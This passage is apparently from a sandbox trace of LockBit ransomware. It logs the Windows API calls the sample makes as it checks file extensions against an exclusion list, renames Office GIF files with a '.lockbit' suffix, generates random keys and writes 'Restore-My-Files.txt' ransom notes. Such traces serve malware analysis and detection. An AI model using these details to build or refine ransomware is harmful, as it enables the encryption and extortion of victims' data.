returned 1 [0204.136] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.136] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF.lockbit") returned 78 [0204.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21299_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.137] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.137] malloc (_Size=0x40068) returned 0x3d70450 [0204.137] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=79) returned 1 [0204.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.138] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.142] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.142] malloc (_Size=0xb2) returned 0x77d7a8 [0204.142] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d7a8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.142] free (_Block=0x77d7a8) [0204.142] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.142] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.142] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482ef000, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x482ef000, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21300_.GIF", cAlternateFileName="")) returned 1 [0204.142] lstrcmpiW (lpString1=".", lpString2="BD21300_.GIF") returned -1 [0204.142] lstrcmpiW (lpString1="..", lpString2="BD21300_.GIF") returned -1 [0204.142] PathFindExtensionW (pszPath="BD21300_.GIF") returned=".GIF" [0204.142] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.142] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.142] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.143] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.143] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.143] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.143] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.143] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21300_.GIF") returned 1 [0204.143] lstrcmpiW (lpString1="ntldr", lpString2="BD21300_.GIF") returned 1 [0204.143] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21300_.GIF") returned 1 [0204.143] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21300_.GIF") returned 1 [0204.143] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21300_.GIF") returned -1 [0204.144] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21300_.GIF") returned 1 [0204.144] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21300_.GIF") returned 1 [0204.144] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.144] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF") returned=".GIF" [0204.144] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.144] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.144] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.144] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF.lockbit") returned 78 [0204.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21300_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.146] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.146] malloc (_Size=0x40068) returned 0x3d70450 [0204.146] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=140) returned 1 [0204.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.146] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.150] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.150] malloc (_Size=0xb2) returned 0x77d7a8 [0204.150] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d7a8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.150] free (_Block=0x77d7a8) [0204.150] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.150] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.150] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.150] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b85800, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51b85800, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0xcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21301_.GIF", cAlternateFileName="")) returned 1 [0204.150] lstrcmpiW (lpString1=".", lpString2="BD21301_.GIF") returned -1 [0204.150] lstrcmpiW (lpString1="..", lpString2="BD21301_.GIF") returned -1 [0204.150] PathFindExtensionW (pszPath="BD21301_.GIF") returned=".GIF" [0204.150] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.150] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.150] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.151] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.151] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.151] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.151] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.151] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.151] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21301_.GIF") returned 1 [0204.151] lstrcmpiW (lpString1="ntldr", lpString2="BD21301_.GIF") returned 1 [0204.151] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21301_.GIF") returned 1 [0204.151] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21301_.GIF") returned 1 [0204.151] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21301_.GIF") returned -1 [0204.151] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21301_.GIF") returned 1 [0204.151] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21301_.GIF") returned 1 [0204.151] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.151] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF") returned=".GIF" [0204.152] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.152] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.152] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.152] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF.lockbit") returned 78 [0204.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21301_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.153] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.153] malloc (_Size=0x40068) returned 0x3d70450 [0204.153] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=204) returned 1 [0204.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.154] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.157] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.157] malloc (_Size=0xb2) returned 0x77d7a8 [0204.158] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d7a8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.158] free (_Block=0x77d7a8) [0204.158] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.158] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.158] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50872b00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x50872b00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x11d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21302_.GIF", cAlternateFileName="")) returned 1 [0204.158] lstrcmpiW (lpString1=".", lpString2="BD21302_.GIF") returned -1 [0204.158] lstrcmpiW (lpString1="..", lpString2="BD21302_.GIF") returned -1 [0204.158] PathFindExtensionW (pszPath="BD21302_.GIF") returned=".GIF" [0204.158] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.158] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.158] lstrcmpiW (lpString1=".hta", lpString2=".GIF") 